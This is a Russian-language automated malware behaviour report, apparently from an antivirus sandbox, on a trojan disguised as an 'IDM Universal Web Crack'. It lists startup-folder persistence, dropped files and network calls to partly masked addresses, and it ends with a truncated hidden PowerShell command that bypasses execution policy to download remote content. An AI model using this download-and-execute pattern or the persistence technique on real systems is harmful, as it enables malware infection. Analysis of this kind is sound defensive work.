Техническая информация
Для обеспечения автозапуска и распространения:
Создает или изменяет следующие файлы:
- %HOMEPATH%\Start Menu\Programs\Startup\script.vbs
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\IDM Universal Web Crack.exe
- %TEMP%\script.vbs
Сетевая активность:
Подключается к:
- 'wp#d':80
- '12#.#99.237.202':80
TCP:
Запросы HTTP GET:
- http://11#.#11.111.1/wpad.dat via wp#d
- http://12#.#99.237.202/idmcrackversion.txt
UDP:
- DNS ASK wp#d
Другое:
Создает и запускает на исполнение:
- '%TEMP%\IDM Universal Web Crack.exe'
- '<SYSTEM32>\wscript.exe' "%TEMP%\script.vbs"
Запускает на исполнение:
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient....
